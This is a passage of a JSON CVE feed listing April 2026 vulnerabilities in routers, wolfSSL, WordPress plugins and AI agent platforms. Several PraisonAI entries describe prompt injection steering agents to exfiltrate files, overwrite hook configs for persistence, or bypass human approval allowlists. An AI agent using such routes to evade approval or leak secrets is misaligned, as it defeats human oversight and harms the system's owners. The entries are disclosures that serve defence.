attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/2581565901/thebugihadfind/issues/1","https://vuldb.com/submit/791897","https://vuldb.com/vuln/356539","https://vuldb.com/vuln/356539/cti"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5986","summary":"A weakness has been identified in Zod jsVideoUrlParser up to 0.5.1. The impacted element is the function getTime in the library lib/util.js. This manipulation of the argument timestamp causes inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.5,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":5.3,"cvss_v4":5.5,"epss":0.00042,"ranking_epss":0.12587,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Zod-/jsVideoUrlParser/issues/121","https://github.com/Zod-/jsVideoUrlParser/issues/121#issue-4159661957","https://vuldb.com/submit/791911","https://vuldb.com/vuln/356540","https://vuldb.com/vuln/356540/cti"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34424","summary":"Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hidden administrator accounts, exfiltrate credentials and access keys, and maintain persistence through multiple injection points including must-use plugins and core file modifications.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00152,"ranking_epss":0.35907,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/","https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/","https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability","https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise","https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise"],"published_time":"2026-04-09T23:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5778","summary":"Integer underflow in wolfSSL packet sniffer <= 5.9.0 allows an attacker to cause a program crash in the AEAD decryption path by injecting a TLS record shorter than the explicit IV plus authentication tag into traffic inspected by ssl_DecodePacket. The underflow wraps a 16-bit length to a large value that is passed to AEAD decryption routines, causing a large out-of-bounds read and crash. An unauthenticated attacker can trigger this remotely via malformed TLS Application Data records.","cvss":2.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.1,"epss":0.0006,"ranking_epss":0.18676,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10125"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5981","summary":"A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the function formAdvFirewall of the file /goform/formAdvFirewall of the component POST Request Handler. Such manipulation of the argument curTime leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formAdvFirewall-33153a41781f80678733f4b12282f3fa?source=copy_link","https://vuldb.com/submit/791854","https://vuldb.com/vuln/356535","https://vuldb.com/vuln/356535/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5982","summary":"A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects the function formAdvNetwork of the file /goform/formAdvNetwork of the component POST Request Handler. Performing a manipulation of the argument curTime results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formAdvNetwork-33153a41781f80f9a47bd5e073fc00ae?source=copy_link","https://vuldb.com/submit/791855","https://vuldb.com/vuln/356536","https://vuldb.com/vuln/356536/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5983","summary":"A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects the function formSetDDNS of the file /goform/formSetDDNS of the component POST Request Handler. Executing a manipulation of the argument curTime can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formSetDDNS-33153a41781f802f9997f48dc9cf6304?source=copy_link","https://vuldb.com/submit/791856","https://vuldb.com/vuln/356537","https://vuldb.com/vuln/356537/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5984","summary":"A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the function formSetLog of the file /goform/formSetLog of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00019,"ranking_epss":0.0481,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formSetLog-33153a41781f8038bbbcc04073d7875b?source=copy_link","https://vuldb.com/submit/791857","https://vuldb.com/vuln/356538","https://vuldb.com/vuln/356538/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40151","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the AgentOS deployment platform exposes a GET /api/agents endpoint that returns agent names, roles, and the first 100 characters of agent system instructions to any unauthenticated caller. The AgentOS FastAPI application has no authentication middleware, no API key validation, and defaults to CORS allow_origins=[\"*\"] with host=\"0.0.0.0\", making every deployment network-accessible and queryable from any origin by default. This vulnerability is fixed in 4.5.128.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09669,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40152","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, he list_files() tool in FileTools validates the directory parameter against workspace boundaries via _validate_path(), but passes the pattern parameter directly to Path.glob() without any validation. Since Python's Path.glob() supports .. path segments, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem. This vulnerability is fixed in 1.5.128.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00048,"ranking_epss":0.14609,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40153","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the execute_command function in shell_tools.py calls os.path.expandvars() on every command argument at line 64, manually re-implementing shell-level environment variable expansion despite using shell=False (line 88) for security. This allows exfiltration of secrets stored in environment variables (database credentials, API keys, cloud access keys). The approval system displays the unexpanded $VAR references to human reviewers, creating a deceptive approval where the displayed command differs from what actually executes. This vulnerability is fixed in 1.5.128.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v8g7-9q6v-p3x8","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v8g7-9q6v-p3x8"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40154","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in 4.5.128.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pv9q-275h-rh7x"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5263","summary":"URI nameConstraints from constrained intermediate CAs are parsed but not enforced during certificate chain verification in wolfcrypt/src/asn.c. A compromised or malicious sub-CA could issue leaf certificates with URI SAN entries that violate the nameConstraints of the issuing CA, and wolfSSL would accept them as valid.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":0.0002,"ranking_epss":0.05412,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10048"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5264","summary":"Heap buffer overflow in DTLS 1.3 ACK message processing. A remote attacker can send a crafted DTLS 1.3 ACK message that triggers a heap buffer overflow.","cvss":8.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.3,"epss":0.00183,"ranking_epss":0.40064,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10076"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5772","summary":"A 1-byte stack buffer over-read was identified in the MatchDomainName function (src/internal.c) during wildcard hostname validation when the LEFT_MOST_WILDCARD_ONLY flag is active.  If a wildcard * exhausts the entire hostname string, the function reads one byte past the buffer without a bounds check, which could cause a crash.","cvss":2.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.1,"epss":0.00042,"ranking_epss":0.12568,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10119"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40114","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /api/v1/runs endpoint accepts an arbitrary webhook_url in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using httpx.AsyncClient. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services. This vulnerability is fixed in 4.5.128.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07357,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40115","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the WSGI-based recipe registry server (server.py) reads the entire HTTP request body into memory based on the client-supplied Content-Length header with no upper bound. Combined with authentication being disabled by default (no token configured), any local process can send arbitrarily large POST requests to exhaust server memory and cause a denial of service. The Starlette-based server (serve.py) has RequestSizeLimitMiddleware with a 10MB limit, but the WSGI server lacks any equivalent protection. This vulnerability is fixed in 4.5.128.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05263,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40116","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits. This vulnerability is fixed in 4.5.128.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00035,"ranking_epss":0.10323,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40117","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, read_skill_file() in skill_tools.py allows reading arbitrary files from the filesystem by accepting an unrestricted skill_path parameter. Unlike file_tools.read_file which enforces workspace boundary confinement, and unlike run_skill_script which requires critical-level approval, read_skill_file has neither protection. An agent influenced by prompt injection can exfiltrate sensitive files without triggering any approval prompt. This vulnerability is fixed in 1.5.128.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04085,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-grrg-5cg9-58pf"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40148","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the _safe_extractall() function in PraisonAI's recipe registry validates archive members against path traversal attacks but performs no checks on individual member sizes, cumulative extracted size, or member count before calling tar.extractall(). An attacker can publish a malicious recipe bundle containing highly compressible data (e.g., 10GB of zeros compressing to ~10MB) that exhausts the victim's disk when pulled via LocalRegistry.pull() or HttpRegistry.pull(). This vulnerability is fixed in 4.5.128.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09836,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40149","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool names (e.g., shell_exec, file_write) to the allowlist, an attacker can cause the ExecApprovalManager to auto-approve all future agent invocations of those tools, bypassing the human-in-the-loop safety mechanism that the approval system is specifically designed to enforce. This vulnerability is fixed in 4.5.128.","cvss":7.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.9,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01582,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40150","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the web_crawl() function in praisonaiagents/tools/web_crawl_tools.py accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or private network checks are applied before fetching. This allows an attacker (or prompt injection in crawled content) to force the agent to fetch cloud metadata endpoints, internal services, or local files via file:// URLs. This vulnerability is fixed in 1.5.128.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07769,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8f4v-xfm9-3244","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8f4v-xfm9-3244"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35645","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion without a request-scoped client to execute privileged operations with unintended administrative scope.","cvss":6.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":6.1,"epss":0.00034,"ranking_epss":0.1004,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7","https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35646","summary":"OpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00055,"ranking_epss":0.17206,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c","https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm","https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39848","summary":"Dockyard is a Docker container management app. Prior to 1.1.0, Docker container start and stop operations are performed through GET requests without CSRF protection. A remote attacker can cause a logged-in administrator's browser to request /apps/action.php?action=stop&name=<container> or /apps/action.php?action=start&name=<container>, which starts or stops the target container. This vulnerability is fixed in 1.1.0.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09622,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/10ij/dockyard/security/advisories/GHSA-jrf6-3j4j-q36g","https://github.com/10ij/dockyard/security/advisories/GHSA-jrf6-3j4j-q36g"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40111","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, he memory hooks executor in praisonaiagents passes a user-controlled command string directly to subprocess.run() with shell=True at src/praisonai-agents/praisonaiagents/memory/hooks.py. No sanitization is performed and shell metacharacters are interpreted by /bin/sh before the intended command executes. Two independent attack surfaces exist. The first is via pre_run_command and post_run_command hook event types registered through the hooks configuration. The second and more severe surface is the .praisonai/hooks.json lifecycle configuration, where hooks registered for events such as BEFORE_TOOL and AFTER_TOOL fire automatically during agent operation. An agent that gains file-write access through prompt injection can overwrite .praisonai/hooks.json and have its payload execute silently at every subsequent lifecycle event without further user interaction. This vulnerability is fixed in 1.5.128.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00022,"ranking_epss":0.05886,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v7px-3835-7gjx","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v7px-3835-7gjx"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40112","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the Flask API endpoint in src/praisonai/api.py renders agent output as HTML without effective sanitization. The _sanitize_html function relies on the nh3 library, which is not listed as a required or optional dependency in pyproject.toml. When nh3 is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output. This vulnerability is fixed in 4.5.128.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08026,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40113","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, deploy.py constructs a single comma-delimited string for the gcloud run\ndeploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validating that these values do not contain commas. gcloud uses a comma as the key-value pair separator for --set-env-vars. A comma in any of the three values causes gcloud to parse the trailing text as additional KEY=VALUE definitions, injecting arbitrary environment variables into the deployed Cloud Run service. This vulnerability is fixed in 4.5.128.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":0.00019,"ranking_epss":0.0494,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fvxx-ggmx-3cjg"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35638","summary":"OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the Control UI that allows unauthenticated sessions to retain self-declared privileged scopes without device identity verification. Attackers can exploit the device-less allow path in the trusted-proxy mechanism to maintain elevated permissions by declaring arbitrary scopes, bypassing device identity requirements.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00041,"ranking_epss":0.12308,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e","https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-self-declared-scopes-in-trusted-proxy-control-ui"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35639","summary":"OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00199,"ranking_epss":0.41961,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35640","summary":"OpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature rejection.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00053,"ranking_epss":0.16398,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53","https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456","https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35642","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability where group reaction events bypass the requireMention access control mechanism. Attackers can trigger reactions in mention-gated groups to enqueue agent-visible system events that should remain restricted.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00025,"ranking_epss":0.06814,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede","https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-group-reactions-via-requiremention-bypass"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35644","summary":"OpenClaw before 2026.3.22 contains an information disclosure vulnerability that allows attackers with operator.read scope to expose credentials embedded in channel baseUrl and httpUrl fields. Attackers can access gateway snapshots via config.get and channels.status endpoints to retrieve sensitive authentication information from URL userinfo components.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00025,"ranking_epss":0.06809,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7","https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j","https://www.vulncheck.com/advisories/openclaw-credential-exposure-via-baseurl-fields-in-gateway-snapshots"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35632","summary":"OpenClaw through 2026.2.22 contains a symlink traversal vulnerability in agents.create and agents.update handlers that use fs.appendFile on IDENTITY.md without symlink containment checks. Attackers with workspace access can plant symlinks to append attacker-controlled content to arbitrary files, enabling remote code execution via crontab injection or unauthorized access via SSH key manipulation.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":6.9,"epss":0.00059,"ranking_epss":0.18485,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-7xr2-q9vf-x4r5","https://www.vulncheck.com/advisories/openclaw-symlink-traversal-via-identity-md-appendfile-in-agents-create-update","https://github.com/openclaw/openclaw/security/advisories/GHSA-7xr2-q9vf-x4r5"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35633","summary":"OpenClaw before 2026.3.22 contains an unbounded memory allocation vulnerability in remote media HTTP error handling that allows attackers to trigger excessive memory consumption. Attackers can send crafted HTTP error responses with large bodies to remote media endpoints, causing the application to allocate unbounded memory before failure handling occurs.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00181,"ranking_epss":0.39788,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438","https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw","https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35634","summary":"OpenClaw before 2026.3.23 contains an authentication bypass vulnerability in the Canvas gateway where authorizeCanvasRequest() unconditionally allows local-direct requests without validating bearer tokens or canvas capabilities. Attackers can send unauthenticated loopback HTTP and WebSocket requests to Canvas routes to bypass authentication and gain unauthorized 